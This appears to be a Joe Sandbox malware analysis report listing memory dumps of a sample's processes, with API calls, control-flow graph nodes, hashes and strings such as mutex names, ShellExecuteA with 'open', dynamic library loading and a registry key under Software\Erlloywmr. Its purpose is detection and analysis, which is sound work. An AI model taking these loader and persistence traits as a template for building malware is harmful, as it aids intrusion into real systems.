Control-flow Graph (entry block 2470005-2470016; graph rendering and node/edge listing omitted)
Strings
Memory Dump Source
• Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-162185446
• Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction ID: 3afbe4cc38f0ed55dbe7a96c418de94d30b110354a0dde8f8f5beda974e8fff7
• Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
• Instruction Fuzzy Hash: 57617E71641288ABEF11DFA0CC49FEA3768EF04705F441516EE19BE2E0D7B1A644CB6E

Control-flow Graph (entry block 28a4af0-28a4b59; graph rendering and node/edge listing omitted)
APIs
• 75A38400.USER32(00000000), ref: 028A4B9E
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID: Software\Erlloywmr$\%d$fronC:\Windows\
• API String ID: 2082808161-3772162829
• Opcode ID: a9628baf7f4705a9de1bf4c0e52ff41b16ec81f16cd7e863ca6d914f1543252f
• Instruction ID: a576445d34babe54ded076101813327544fa1adef2098fd1ca3001b5a1a56e97
• Opcode Fuzzy Hash: a9628baf7f4705a9de1bf4c0e52ff41b16ec81f16cd7e863ca6d914f1543252f
• Instruction Fuzzy Hash: 9A61607DD44118AFEB18CF54CC59BE9B775EB58705F0085D8E30AAA280DBB0AAC5CF90

Control-flow Graph (entry block 28b392d-28b3967; graph rendering and node/edge listing omitted)
APIs
• 771B0BD0.KERNEL32(00000000), ref: 028B39A2
• 771AF550.KERNEL32(00000000,028A2700), ref: 028B39C4
• 771B0BD0.KERNEL32(00000000), ref: 028B39FF
• 771AF550.KERNEL32(00000000,028A2700), ref: 028B3A21
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: F550
• String ID: Z
• API String ID: 963841436-1505515367
• Opcode ID: f8cf23ca9d0e1e9f9ddeca6525d8d5bc02134c97066f42e1b56ace04c19e164e
• Instruction ID: efc8d6b059125077d2aba0c7342e5feb5691fc098b526f10f0c6494dd36d38d1
• Opcode Fuzzy Hash: f8cf23ca9d0e1e9f9ddeca6525d8d5bc02134c97066f42e1b56ace04c19e164e
• Instruction Fuzzy Hash: E8517D7DD80244ABE7229B68DC09BE97774AB08702F004998F34DE62C0CBF465D5CF66

Control-flow Graph (rendered graph not preserved in text; legend: Executed / Not Executed)
APIs
• 771B0BD0.KERNEL32(?), ref: 02937C02
• 771AF550.KERNEL32(?,02934FF9), ref: 02937C20
• 771B4100.KERNEL32(?,02934FF9), ref: 02937C31
• 771B04C0.KERNEL32(02880000,00001000,00000004,?,00000000), ref: 02937C7F
• 771B04C0.KERNEL32(02880000,00001000), ref: 02937C94
Memory Dump Source
• Source File: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: B4100F550
• String ID:
• API String ID: 2761073125-0
• Opcode ID: b80b8083aaf405fcb1ee6e77209b1dff6932bc48746bfa626d4bac8fef949b26
• Instruction ID: cc39936bd5778060edaac5397c71028f099134f962ee8b4a96b532936f6c6e50
• Opcode Fuzzy Hash: b80b8083aaf405fcb1ee6e77209b1dff6932bc48746bfa626d4bac8fef949b26
• Instruction Fuzzy Hash: F151E4F16547528AD7229AF89CC07E1F7B8EB422247180B7DC5E6C73C5E7A45806C760

Control-flow Graph (rendered graph not preserved in text; legend: Executed / Not Executed)
APIs
• 75A38400.USER32(?,purity_control_%x,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 028A67A0
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID: purity_control_%x$purity_control_%x
• API String ID: 2082808161-2962537068
• Opcode ID: 4efad60bc12e739add2e88d9081b46f13ab5ee2f15d0cfe65a08e294ea310e94
• Instruction ID: 6e52f0e1333134af8ee99ec18bb1e1eba723130d332c9bd8209972306a9acc05
• Opcode Fuzzy Hash: 4efad60bc12e739add2e88d9081b46f13ab5ee2f15d0cfe65a08e294ea310e94
• Instruction Fuzzy Hash: CE0291BD9042189BDB24CF14CCA0FEA777ABF95304F0885A8E54DD7244EB729A95CF90

Control-flow Graph (rendered graph not preserved in text; legend: Executed / Not Executed)
APIs
• 75A38400.USER32(00000000), ref: 028B260A
• 75A38400.USER32(00000000), ref: 028B2703
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
• Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID: M_%d_$M_%d_
• API String ID: 2082808161-485321427
• Opcode ID: 014745637fd3095237176fc0622b2f66905bca91611734ea716f2f96a61e94b2
• Instruction ID: 524b3f8c3a9787d7c232d2468d0ebd23e855c6556185a9dec60407ecbb0b5935
• Opcode Fuzzy Hash: 014745637fd3095237176fc0622b2f66905bca91611734ea716f2f96a61e94b2
• Instruction Fuzzy Hash: C15171BDC40218ABDB20DB64DC8CBE9B779AF58701F0049D9E64DE6280DBB49AD5CF50

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1521 28b174a-28b1822 75A38400 1524 28b1828-28b1832 1521->1524 1525 28b192e-28b195c 1521->1525 1527 28b1843-28b189c 1524->1527 1529 28b191a-28b1928 7686EB20 1527->1529 1530 28b189e-28b18bb call 28a8deb 1527->1530 1529->1525 1534 28b1918-28b191c 1530->1534 1535 28b18bd-28b18f2 1530->1535 1534->1527 1540 28b18fd-28b1905 call 28ae329 1535->1540 1541 28b18f4-28b18fa 1535->1541 1543 28b190a-28b190d 1540->1543 1541->1540 1543->1534
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%s%s,028A2210,028A267C,?,?,00000000,028B8090,028A3FF8,000000FF,?,028B3AFC,80000001), ref: 028B17F8
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028B1928
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                    • API String ID: 1693585421-3252725368
                                                                                                                                                                                                                                    • Opcode ID: 221278d337b914a1d744f8b1f43f0d6d9b37e9951873be852d99e5ec2148cb8a
                                                                                                                                                                                                                                    • Instruction ID: 41c4e06cdba5d4dea6cf8f3bc2e580af6b302b5e511cf0c14167eb4fddaf70bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 221278d337b914a1d744f8b1f43f0d6d9b37e9951873be852d99e5ec2148cb8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5518279D40258ABDB21DB98DC9CBEEB7B4BF08704F004699E60DE7280DB795A45CF90

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1544 28a5a6a-28a5a89 1546 28a5beb-28a5bf2 1544->1546 1547 28a5a8f-28a5a99 1544->1547 1548 28a5c01-28a5c05 1546->1548 1549 28a5bf4-28a5bfb 7686EB20 1546->1549 1547->1546 1550 28a5a9f-28a5aca 1547->1550 1549->1548 1552 28a5bd9-28a5be6 1550->1552 1553 28a5ad0-28a5b2c 75A38400 1550->1553 1552->1546 1554 28a5b33-28a5b35 1553->1554 1556 28a5b46-28a5b82 1554->1556 1557 28a5b37-28a5b41 1554->1557 1558 28a5bd4 1556->1558 1559 28a5b84-28a5b8a 1556->1559 1557->1552 1558->1552 1560 28a5b91-28a5b9f 1559->1560 1561 28a5ba1-28a5bb2 1559->1561 1562 28a5bb4-28a5bc3 1559->1562 1563 28a5bc5-28a5bd1 1559->1563 1560->1558 1561->1558 1562->1558 1563->1558
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 1693585421-3771101883
                                                                                                                                                                                                                                    • Opcode ID: 376b9ac63292d9a0fb9bd4b94ae3b14fcb80aa76b820a414525ca865102ddec1
                                                                                                                                                                                                                                    • Instruction ID: c7a7dc05d4b95edfcd98cebee15c2d9d2e23afed9fb65fa22ebfe72a9eb1e9be
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 376b9ac63292d9a0fb9bd4b94ae3b14fcb80aa76b820a414525ca865102ddec1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2111ECB9D41218EBEB24CF94DC98BE9B3B4BB48308F5441C9D10AA6280DB789BC5CF54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2082808161-3771101883
                                                                                                                                                                                                                                    • Opcode ID: 2fe5dd882e46da301873ac46fd8b180e03e2d82d2233f5fc7fd1835660b27102
                                                                                                                                                                                                                                    • Instruction ID: 964d82cfaafc2e36aa4b468159c5635f832f953b3a044ead6d8c945c120ea05a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fe5dd882e46da301873ac46fd8b180e03e2d82d2233f5fc7fd1835660b27102
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B401D2B994111CEBEB24CF95DC98BE9B3B4BB58304F5045C8E10AA6140DB749BC5CF54
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(?,028A3C48,00000008), ref: 028A4C2F
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028A4D6F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 1693585421-3143526458
                                                                                                                                                                                                                                    • Opcode ID: a764d8c8946b2c2c86e36c991c20e49a413a08aac2ec652a1d47799680410900
                                                                                                                                                                                                                                    • Instruction ID: aa54505ab6153baa48c89e610753bc796fab75220d47311e33e1c4cdbf4cd42a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a764d8c8946b2c2c86e36c991c20e49a413a08aac2ec652a1d47799680410900
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC31197DD40118AFDB18CF14CCA59D9F775EB59305F008598E70AAB241DBB0AAC1CF90
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686
• String ID: >
• API String ID: 3028004676-325317158
APIs
• 75A38400.USER32(00000000,028A22B4,00000000), ref: 028AA635
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID: 46390628699
• API String ID: 2082808161-4273875350
APIs
• 75A38400.USER32(?,028A3C54,00000008), ref: 028A5153
• 7686EB20.ADVAPI32(?), ref: 028A543A
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686A38400
• String ID: fronC:\Windows\
• API String ID: 1693585421-3143526458
APIs
• 75A38400.USER32(00000000,028A2F00,00000104,00000000), ref: 028A906B
• 7686EB20.ADVAPI32(028A9F2F), ref: 028A90AF
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686A38400
• String ID:
• API String ID: 1693585421-0
APIs
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686
• String ID:
• API String ID: 3028004676-0
APIs
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: 7686
• String ID:
• API String ID: 3028004676-0
APIs
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400
• String ID:
• API String ID: 2082808161-0
APIs
• 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5983
• 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
• 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
Memory Dump Source
• Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: A38400$7686
• String ID:
• API String ID: 1720462038-0
Memory Dump Source
• Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• 771B4100.KERNEL32(00000000), ref: 0292D9AD
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: B4100
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 1198398010-162185446
APIs
• 771B4100.KERNEL32(00000000), ref: 0292D9AD
Strings
Memory Dump Source
• Source File: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID: B4100
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 1198398010-1163154406
Strings
Memory Dump Source
• Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
• API String ID: 0-1163154406
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: bac0f8e0aefe37438037734f56ba5b17bf556c11f8fdc671dc31a9468cac92bf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB617E71640288ABEF10DFA0CC49FEB3768EF05711F640515FE09BE1E1DAB16644AB6E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction ID: e2c79bb9501d0788d93122cb9c453c413aa447e8d1bf1422ef3893417cd7bbb2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B15D35A002898FEF10CF64CC44BAA37A5FF44314F684925DC0DAF2A1DB75AA94DF4A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000024.00000002.2654653222.0000000000F60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_36_2_f60000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                                                                                                                                                                                                                    • API String ID: 0-1163154406
                                                                                                                                                                                                                                    • Opcode ID: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction ID: 81a5f24e2804395085d074ae308754b3c9dcc53489e5f93cc7f17a8b37518073
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 298c227c3451a7e4a89f89ac4088bd7e176ed07f7e37ac0a3aeb73030b538f9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94112D31640388ABEF11DEA08D5DFEE37A8EF84B01F140414FE09EE0E0DAB19644972B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000025.00000002.2677593413.00000000021D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_37_2_21d0000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
